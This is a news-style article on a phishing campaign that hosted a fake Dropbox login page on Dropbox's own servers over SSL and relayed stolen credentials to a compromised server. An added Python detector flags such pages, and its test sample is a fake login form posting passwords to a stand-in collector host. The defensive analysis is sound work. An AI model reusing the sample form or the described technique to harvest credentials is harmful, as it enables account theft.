Seven million Dropbox users recently lost their login and password credentials in a major leak, and users of the cloud storage service have now become the targets of a major phishing attack.
The attack, spread by thousands of spam emails, invites users to download a recently sent file by clicking on the link provided in the message.
The scam email uses the subject ‘important’ and claims the recipient has been sent a document that was too big to be sent by email, or that cannot be sent by email for security reasons.
It goes on to say the document can be viewed by clicking the link inside the message. The link, however, leads to a fake Dropbox login page that is hosted on Dropbox itself. The page sits on Dropbox's user content domains, just as ordinary shared files do, and is served over SSL, which makes the attack more dangerous.
The scammers are using the page for more than Dropbox credentials: it also carries the logos of popular email services, suggesting that users can sign in with those credentials as well. After users ‘log in’, their credentials are sent to a PHP script on a compromised Web server. The credentials are also submitted over SSL, which matters for the attack: posting a form from an HTTPS page to a non-HTTPS address would cause the browser to show the user a security warning.
“The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications,” explained Nick Johnson of Symantec, the security firm that detailed the workings of the attack.
The attack is more sophisticated than the average phishing attack: because the page is hosted on Dropbox's own servers and delivered over an SSL-encrypted connection, it passes the usual ‘idiot checks’ (unfamiliar domain, missing padlock) that expose low-level phishing attacks.
Similar attacks were seen earlier in the year against the Google Docs cloud storage service.
Users are curious about what the file contains, so the likelihood of them clicking the link is high. Once on the phony site they are asked to log in, after which their credentials are sent to the cyber criminals. They are then redirected to the real login page of the service the criminals impersonated on the phony page, leaving them to believe that nothing out of the ordinary happened.
Criminals also used shortened URLs to point victims to phishing domains requesting several different types of credentials.
A single landing page requested Yahoo, Gmail, AOL and Windows Live credentials, plus any other account via an option called ‘Other emails’. The landing pages were built to mimic Google Docs, Microsoft OneDrive or Facebook, even though Google Docs has since been relaunched as Google Drive.
To protect yourself against such attacks, follow best practices such as never opening suspicious email attachments and regularly changing all your passwords. In particular, consider changing the passwords for your email accounts, social networks and online banking.
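The two traits that distinguish this campaign from a crude phishing page, a login form served from a trusted user-content host that posts credentials to an unrelated server, and a single form that asks for several providers' credentials at once, can be checked mechanically from the page URL and its HTML. The following is an added example written for this article; it is not code from Symantec or from the article itself. The host names and the HTML sample are constructed stand-ins (the article does not name the user-content domain or the compromised server), and `analyze_login_page` is a hypothetical helper name.

```python
"""Flag the phishing-page indicators described in the article, from a page's
URL and HTML. Added example; host names and HTML are constructed.

Indicators reported:
  - a form with a password field whose action posts to a host other than
    the one the page was served from (trusted host, foreign collector);
  - a credential form whose action is not HTTPS (would trigger the browser
    warning the article mentions);
  - one form that advertises several email providers' logins at once.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Provider names the article says appeared on a single landing page.
PROVIDER_WORDS = ("yahoo", "gmail", "aol", "windows live", "other email")


class _FormCollector(HTMLParser):
    """Collect each <form>: its action, whether it has a password input,
    and the lower-cased text and image alt text inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "has_password": False, "text": ""}
        elif self._current is not None:
            if tag == "input" and (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
            if tag == "img":  # provider logos usually carry their name as alt text
                self._current["text"] += " " + (a.get("alt") or "").lower()

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += " " + data.lower()


def analyze_login_page(page_url, html):
    """Return a list of human-readable findings for credential forms on the page."""
    parser = _FormCollector()
    parser.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue  # only forms that collect a password matter here
        action = urljoin(page_url, form["action"])  # resolve relative actions
        target = urlparse(action)
        target_host = (target.hostname or "").lower()
        if target_host != page_host:
            findings.append(
                f"credentials posted off-origin: page on {page_host}, "
                f"form posts to {target_host}")
        if target.scheme != "https":
            findings.append(f"credentials posted without TLS to {action}")
        providers = [w for w in PROVIDER_WORDS if w in form["text"]]
        if len(providers) >= 2:
            findings.append("one form collects logins for several providers: "
                            + ", ".join(providers))
    return findings


# Constructed sample: a fake login page on a user-content style host whose
# form posts to a PHP script on a different (hypothetical) server.
SAMPLE_PAGE_URL = "https://files.usercontent-host.invalid/u/123/document.html"
SAMPLE_HTML = """
<html><body>
<h1>Sign in to view the document</h1>
<form method="post" action="https://compromised-site.invalid/collect.php">
  <img alt="Gmail"> <img alt="Yahoo"> <img alt="AOL"> <img alt="Windows Live">
  <span>Other emails</span>
  <input name="email"> <input type="password" name="pass">
  <button>Sign in</button>
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyze_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("!", finding)
```

The off-origin check is the one a real Dropbox-hosted page cannot pass: a legitimate Dropbox login form posts back to a Dropbox host, while the fake page's form had to reach the attackers' own collector. Note that the check is advisory; a same-origin form on a lookalike domain still needs the domain itself to be verified.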